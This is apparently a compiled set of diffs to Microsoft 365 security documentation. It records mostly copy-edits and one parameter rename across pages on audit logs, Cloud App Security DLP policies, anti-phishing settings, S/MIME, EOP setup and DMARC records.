-Information security and compliance teams can use these tools to proactively review activities performed by both end users and administrators across services. Automatic alerts can be configured to send email notifications when certain activities occur on specific site collections - for example when content is shared from sites known to contain GDPR related information. This allows those teams to follow up with users to ensure that corporate security policies are followed, or to provide additional training.
+Information security and compliance teams can use these tools to proactively review activities performed by both end users and administrators across services. Automatic alerts can be configured to send email notifications when certain activities occur on specific site collections - for example when content is shared from sites known to contain GDPR-related information. This allows those teams to follow up with users to ensure that corporate security policies are followed, or to provide additional training.
-Information security teams can also search the audit log to investigate suspected data breaches and determine both root cause and the extent of the breach. This built in capability facilitates compliance with article 33 and 34 of the GDPR, which require notifications be provided to the GDPR supervisory authority and to the data subjects themselves of a data breach within a specific time period. Audit log entries are only retained for 90 days within the service - it is often recommended and many organizations required that these logs be retained for longer periods of time.
+Information security teams can also search the audit log to investigate suspected data breaches and determine both root cause and the extent of the breach. This built-in capability facilitates compliance with article 33 and 34 of the GDPR, which require notifications be provided to the GDPR supervisory authority and to the data subjects themselves of a data breach within a specific time period. Audit log entries are only retained for 90 days within the service - it is often recommended and many organizations required that these logs be retained for longer periods of time.
-Solutions are available which subscribe to the Unified Audit Logs through the Microsoft Management Activity API and can both store log entries as needed, and provide advanced dashboards and alerts. One example is [Microsoft Operations Management Suite (OMS)](https://docs.microsoft.com/azure/operations-management-suite/oms-solution-office-365).
+Solutions are available that subscribe to the Unified Audit Logs through the Microsoft Management Activity API and can both store log entries as needed, and provide advanced dashboards and alerts. One example is [Microsoft Operations Management Suite (OMS)](https://docs.microsoft.com/azure/operations-management-suite/oms-solution-office-365).
More information about alert policies and searching the audit log:
@@ -94,11 +94,11 @@ More information about alert policies and searching the audit log:
## Microsoft Cloud App Security
-Microsoft Cloud App Security helps you discover other SaaS apps in use across your networks and sensitive data that is sent to and from these apps.
+Microsoft Cloud App Security helps you discover other SaaS apps in use across your networks and sensitive data sent to and from these apps.
-Microsoft Cloud App Security is a comprehensive service providing deep visibility, granular controls and enhanced threat protection for your cloud apps. It identifies more than 15,000 cloud applications in your network-from all devices-and provides risk scoring and ongoing risk assessment and analytics. No agents required: information is collected from your firewalls and proxies to give you complete visibility and context for cloud usage and shadow IT.
+Microsoft Cloud App Security is a comprehensive service providing deep visibility, granular controls, and enhanced threat protection for your cloud apps. It identifies more than 15,000 cloud applications in your network-from all devices-and provides risk scoring and ongoing risk assessment and analytics. No agents required: information is collected from your firewalls and proxies to give you complete visibility and context for cloud usage and shadow IT.
-To better understand your cloud environment, Cloud App Security investigate feature provides deep visibility into all activities, files and accounts for sanctioned and managed apps. You can gain detailed information on a file level and discover where data travels in the cloud apps.
+To better understand your cloud environment, the Cloud App Security investigate feature provides deep visibility into all activities, files, and accounts for sanctioned and managed apps. You can gain detailed information on a file level and discover where data travels in the cloud apps.
For examples, the following illustration demonstrates two Cloud App Security policies that can help with GDPR.
@@ -145,7 +145,7 @@ Alert when a file containing a credit card number is shared from an approved clo
|Category|DLP| |Filter settings|Access level = Public (Internet), Public, External <p> App = \<select apps\> (use this setting if you want to limit monitoring to specific SaaS apps)| |Apply to|All files, all owners|
-|Content inspection|Includes files that match a present expression: All countries: Finance: Credit card number <p> Don't require relevant context: unchecked (this will match keywords as well as regex) <p> Includes files with at least 1 match <p> Unmask the last 4 characters of the violation: checked|
+|Content inspection|Includes files that match a present expression: All countries: Finance: Credit card number <p> Don't require relevant context: unchecked (this setting will match keywords as well as regex) <p> Includes files with at least 1 match <p> Unmask the last 4 characters of the violation: checked|
|Alerts|Create an alert for each matching file: checked <p> Daily alert limit: 1000 <p> Select an alert as email: checked <p> To: infosec@contoso.com| |Governance|Microsoft OneDrive for Business <p> Make private: check Remove External Users <p> All other settings: unchecked <p> Microsoft SharePoint Online <p> Make private: check Remove External Users <p> All other settings: unchecked| |
@@ -180,5 +180,5 @@ Notes:
Similar policies: -- Detect large downloads of Customer data or HR Data ΓÇö Alert when a large number of files containing customer data or HR data have been detected being downloaded by a single user within a short period of time.-- Detect Sharing of Customer and HR Data ΓÇö Alert when files containing Customer or HR Data are shared.
+- Detect large downloads of Customer data or HR DataΓÇöAlert when a large number of files containing customer data or HR data have been detected being downloaded by a single user within a short period of time.
+- Detect Sharing of Customer and HR DataΓÇöAlert when files containing Customer or HR Data are shared.
security https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/recommended-settings-for-eop-and-office365-atp https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/recommended-settings-for-eop-and-office365-atp.md
@@ -133,7 +133,7 @@ For more information about these settings, see [Spoof settings](set-up-anti-phis
|Security feature name|Default|Standard|Strict|Comment| |---|:---:|:---:|:---:|---|
-|**Enable anti-spoofing protection** <p> _EnableAntispoofEnforcement_|On <p> `$true`|On <p> `$true`|On <p> `$true`||
+|**Enable anti-spoofing protection** <p> _EnableSpoofIntelligence_|On <p> `$true`|On <p> `$true`|On <p> `$true`||
|**Enable Unauthenticated Sender** <p> _EnableUnauthenticatedSender_|On <p> `$true`|On <p> `$true`|On <p> `$true`|Adds a question mark (?) to the sender's photo in Outlook for unidentified spoofed senders. For more information, see [Spoof settings in anti-phishing policies](set-up-anti-phishing-policies.md).| |**If email is sent by someone who's not allowed to spoof your domain** <p> _AuthenticationFailAction_|**Move message to the recipients' Junk Email folders** <p> `MoveToJmf`|**Move message to the recipients' Junk Email folders** <p> `MoveToJmf`|**Quarantine the message** <p> `Quarantine`|This setting applies to blocked senders in [spoof intelligence](learn-about-spoof-intelligence.md).| |
@@ -187,7 +187,7 @@ Note that these are the same settings that are available in [anti-spam policy se
|Security feature name|Default|Standard|Strict|Comment| |---|---|---|---|---|
-|**Enable anti-spoofing protection** <p> _EnableAntispoofEnforcement_|On <p> `$true`|On <p> `$true`|On <p> `$true`||
+|**Enable anti-spoofing protection** <p> _EnableSpoofIntelligence_|On <p> `$true`|On <p> `$true`|On <p> `$true`||
|**Enable Unauthenticated Sender** <p> _EnableUnauthenticatedSender_|On <p> `$true`|On <p> `$true`|On <p> `$true`|Adds a question mark (?) to the sender's photo in Outlook for unidentified spoofed senders. For more information, see [Spoof settings in anti-phishing policies](set-up-anti-phishing-policies.md).| |**If email is sent by someone who's not allowed to spoof your domain** <p> _AuthenticationFailAction_|**Move message to the recipients' Junk Email folders** <p> `MoveToJmf`|**Move message to the recipients' Junk Email folders** <p> `MoveToJmf`|**Quarantine the message** <p> `Quarantine`|This setting applies to blocked senders in [spoof intelligence](learn-about-spoof-intelligence.md).| |
security https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/s-mime-for-message-signing-and-encryption https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/s-mime-for-message-signing-and-encryption.md
@@ -55,7 +55,7 @@ The steps that you follow to set up S/MIME with each of these end points is slig
> [!NOTE] > You can't install S/MIME control in Outlook on the web on Mac, iOS, Android, or other non-Windows devices. For more information, see [Encrypt messages by using S/MIME in Outlook on the web](https://support.microsoft.com/office/878c79fc-7088-4b39-966f-14512658f480).
-## Setup S/MIME with Outlook on the web
+## Set up S/MIME with Outlook on the web
Setting up S/MIME for Exchange Online with Outlook on the web involves the following key steps:
security https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/set-up-your-eop-service https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/set-up-your-eop-service.md
@@ -13,7 +13,7 @@ ms.custom:
- seo-marvel-apr2020 localization_priority: Normal ms.assetid: d74c6ddf-11b0-43ee-b298-8bb0340895f0
-description: "Admins can learn how to setup standalone Exchange Online Protection (EOP) to protect on-premises email environments."
+description: "Admins can learn how to set up standalone Exchange Online Protection (EOP) to protect on-premises email environments."
--- # Set up your standalone EOP service
security https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/switch-to-eop-from-google-postini-the-barracuda-spam-and-virus-firewall-or-cisco https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/switch-to-eop-from-google-postini-the-barracuda-spam-and-virus-firewall-or-cisco.md
@@ -39,7 +39,7 @@ If you currently host your mailboxes on premises and use an on-premises protecti
## Switch to Exchange Online
-Perhaps you have on-premises mailboxes protected by an on-premises appliance, and you want to jump to Exchange Online cloud-hosted mailboxes and EOP protection to take advantage of Microsoft 365 cloud messaging and protection features. To get started, you can sign up for Microsoft 365 and add your domain. This scenario doesn't require you to setup connectors, because there isn't any routing to on-premises mailboxes. Begin at [Get the latest advanced features with Microsoft 365](https://www.microsoft.com/microsoft-365/business/compare-more-office-365-for-business-plans) to sign-up and get familiar with its features.
+Perhaps you have on-premises mailboxes protected by an on-premises appliance, and you want to jump to Exchange Online cloud-hosted mailboxes and EOP protection to take advantage of Microsoft 365 cloud messaging and protection features. To get started, you can sign up for Microsoft 365 and add your domain. This scenario doesn't require you to set up connectors, because there isn't any routing to on-premises mailboxes. Begin at [Get the latest advanced features with Microsoft 365](https://www.microsoft.com/microsoft-365/business/compare-more-office-365-for-business-plans) to sign-up and get familiar with its features.
During the Microsoft 365 setup process, you will create your cloud-based mailbox users.
security https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/troubleshooting-mail-sent-to-office-365 https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/troubleshooting-mail-sent-to-office-365.md
@@ -123,7 +123,7 @@ Just as important as the way the emails are sent is the content they contain. Wh
- Redirects included in the body of the message should be similar and consistent, and not multiple and varied. A redirect in this context is anything that points away from the message, such as links and documents. If you have a lot of advertising or Unsubscribe links or Update the Profile links, they should all point to the same domain. For example:
- Correct:
+ Correct (all domains are the same):
`unsubscribe.bulkmailer.com`
@@ -131,7 +131,7 @@ Just as important as the way the emails are sent is the content they contain. Wh
`options.bulkmailer.com`
- Incorrect:
+ Incorrect (all domains are different):
`unsubscribe.bulkmailer.com`
security https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/use-dmarc-to-validate-email https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/use-dmarc-to-validate-email.md
@@ -30,7 +30,7 @@ Domain-based Message Authentication, Reporting, and Conformance ([DMARC](https:/
## How do SPF and DMARC work together to protect email in Microsoft 365?
- An email message may contain multiple originator, or sender, addresses. These addresses are used for different purposes. For example, consider these addresses:
+ An email message may contain multiple originator or sender addresses. These addresses are used for different purposes. For example, consider these addresses:
- **"Mail From" address**: Identifies the sender and specifies where to send return notices if any problems occur with the delivery of the message, such as non-delivery notices. This appears in the envelope portion of an email message and is not usually displayed by your email application. This is sometimes called the 5321.MailFrom address or the reverse-path address.
@@ -171,7 +171,7 @@ Once you have formed your record, you need to update the record at your domain r
## Best practices for implementing DMARC in Microsoft 365
-You can implement DMARC gradually without impacting the rest of your mail flow. Create and implement a roll out plan that follows these steps. Do each of these steps first with a sub-domain, then other sub-domains, and finally with the top-level domain in your organization before moving on to the next step.
+You can implement DMARC gradually without impacting the rest of your mail flow. Create and implement a roll-out plan that follows these steps. Do each of these steps first with a sub-domain, then other sub-domains, and finally with the top-level domain in your organization before moving on to the next step.
1. Monitor the impact of implementing DMARC
@@ -187,15 +187,15 @@ You can implement DMARC gradually without impacting the rest of your mail flow.
The final step is implementing a reject policy. A reject policy is a DMARC TXT record that has its policy set to reject (p=reject). When you do this, you're asking DMARC receivers not to accept messages that fail the DMARC checks.
-4. How to setup DMARC for subdomain?
+4. How to set up DMARC for subdomain?
-DMARC is implemented by publishing a policy as a TXT record in DNS and is hierarchical (e.g. a policy published for contoso.com will apply to sub.domain.contonos.com unless a different policy is explicitly defined for the subdomain). This is useful as organizations may be able to specify a smaller number of high level DMARC records for wider coverage. Care should be taken to configure explicit subdomain DMARC records where you do not want the subdomains to inherit the top level domain's DMARC record.
+ DMARC is implemented by publishing a policy as a TXT record in DNS and is hierarchical (e.g. a policy published for contoso.com will apply to sub.domain.contonos.com unless a different policy is explicitly defined for the subdomain). This is useful as organizations may be able to specify a smaller number of high-level DMARC records for wider coverage. Care should be taken to configure explicit subdomain DMARC records where you do not want the subdomains to inherit the top-level domain's DMARC record.
-Also, you can add a wildcard-type policy for DMARC when subdomains shouldn't be sending email, by adding the `sp=reject` value. For example:
+ Also, you can add a wildcard-type policy for DMARC when subdomains shouldn't be sending email, by adding the `sp=reject` value. For example:
-```console
-_dmarc.contoso.com. TXT "v=DMARC1; p=reject; sp=reject; ruf=mailto:authfail@contoso.com; rua=mailto:aggrep@contoso.com"
-```
+ ```text
+ _dmarc.contoso.com. TXT "v=DMARC1; p=reject; sp=reject; ruf=mailto:authfail@contoso.com; rua=mailto:aggrep@contoso.com"
+ ```
## How Microsoft 365 handles outbound email that fails DMARC
@@ -221,7 +221,7 @@ For more information, see [Create safe sender lists](create-safe-sender-lists-in
All hosted mailboxes in Microsoft 365 will now gain the benefit of ARC with improved deliverability of messages and enhanced anti-spoofing protection. ARC preserves the email authentication results from all participating intermediaries, or hops, when an email is routed from the originating server to the recipient mailbox. Before ARC, modifications performed by intermediaries in email routing, like forwarding rules or automatic signatures, could cause DMARC failures by the time the email reached the recipient mailbox. With ARC, the cryptographic preservation of the authentication results allows Microsoft 365 to verify the authenticity of an email's sender.
-Microsoft 365 currently utilizes ARC to verify authentication results when Microsoft is the ARC Sealer, but plan to add support for third party ARC sealers in the future.
+Microsoft 365 currently utilizes ARC to verify authentication results when Microsoft is the ARC Sealer, but plan to add support for third-party ARC sealers in the future.
## Troubleshooting your DMARC implementation
solutions https://docs.microsoft.com/en-us/microsoft-365/solutions/groups-naming-policy https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/solutions/groups-naming-policy.md
@@ -23,7 +23,7 @@ description: "Learn how to create a naming policy for Microsoft 365 groups."
You can use a group naming policy to enforce a consistent naming strategy for groups created by users in your organization. A naming policy can help you and your users identify the function of the group, membership, geographic region, or who created the group. The naming policy can also help categorize groups in the address book. You can use the policy to block specific words from being used in group names and aliases.
-The naming policy is applied to groups that are created across all groups workloads (like Outlook, Microsoft Teams, SharePoint, Planner, Yammer, etc.). It gets applied to both the group name and group alias. It gets applied when a user creates a group and when group name or alias is edited for an existing group.
+The naming policy is applied to groups that are created across all groups workloads (like Outlook, Microsoft Teams, SharePoint, Planner, Yammer, etc.). It gets applied to both the group name and group alias. It also gets applied when a user creates a group and when the group name, alias, description, or avatar is edited for an existing group.
> [!TIP] > A Microsoft 365 group naming policy only applies to Microsoft 365 groups. It doesn't apply to distribution groups created in Exchange Online. To create a naming policy for distribution groups, see [Create a distribution group naming policy](https://docs.microsoft.com/exchange/recipients-in-exchange-online/manage-distribution-groups/create-group-naming-policy).